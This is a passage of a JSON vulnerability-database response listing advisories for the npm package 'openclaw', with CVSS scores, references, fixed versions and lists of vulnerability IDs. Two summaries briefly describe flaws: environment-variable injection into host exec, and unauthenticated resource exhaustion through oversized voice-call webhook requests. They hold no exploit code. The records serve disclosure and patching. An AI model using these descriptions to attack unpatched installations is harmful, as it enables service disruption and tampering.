                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/2321d67263bc710e357644d59f746b08d891051b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/2321d67263bc710e357644d59f746b08d891051b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-93rg-2xm5-2p9v",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-93rg-2xm5-2p9v"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-93rg-2xm5-2p9v",
                    "reference_id": "GHSA-93rg-2xm5-2p9v",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-93rg-2xm5-2p9v"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"
                }
            ],
            "aliases": [
                "GHSA-93rg-2xm5-2p9v"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e25p-j5ed-yqfz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90221?format=api",
            "vulnerability_id": "VCID-e4ac-qm17-qbf5",
            "summary": "## Impact\n\nOpenClaw Host-Exec Environment Variable Injection.\n\nHost exec could inherit environment variables that influence interpreters, shells, or build tools.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.28`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @wsparks-vc for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-w9j9-w4cp-6wgr",
                    "reference_id": "GHSA-w9j9-w4cp-6wgr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-w9j9-w4cp-6wgr"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w9j9-w4cp-6wgr",
                    "reference_id": "GHSA-w9j9-w4cp-6wgr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w9j9-w4cp-6wgr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "GHSA-w9j9-w4cp-6wgr"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e4ac-qm17-qbf5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90046?format=api",
            "vulnerability_id": "VCID-eaaf-8rfa-f3hz",
            "summary": "Duplicate Advisory: OpenClaw is vulnerable to unauthenticated resource exhaustion through its voice call webhook handling\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rm59-992w-x2mv. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains an unauthenticated resource exhaustion vulnerability in voice call webhook handling that buffers request bodies before provider signature checks. Attackers can send large or malicious webhook requests to exhaust server resources without authentication, because the body is buffered before signature validation runs.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35626",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35626"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-36cp-mh65-x882",
                    "reference_id": "GHSA-36cp-mh65-x882",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-36cp-mh65-x882"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
